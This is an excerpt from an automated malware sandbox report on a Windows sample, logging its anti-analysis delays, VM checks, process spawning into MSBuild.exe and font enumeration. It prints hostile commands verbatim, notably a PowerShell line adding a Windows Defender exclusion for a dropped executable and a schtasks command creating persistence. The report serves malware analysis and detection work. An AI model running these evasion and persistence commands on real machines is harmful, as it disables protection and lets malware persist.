Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1199110s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1198110s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1197110s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1196985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1196860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -1196735s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99014	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97921
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1199110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1198110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1197110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196735

Source: jYRIGnZlROed.exe, 00000009.00000002.1693998023.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: MSBuild.exe, 0000000D.00000002.4082602524.0000000006129000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1661949641.0000000001272000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MSBuild.exe, 00000008.00000002.1682457082.0000000005E6A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
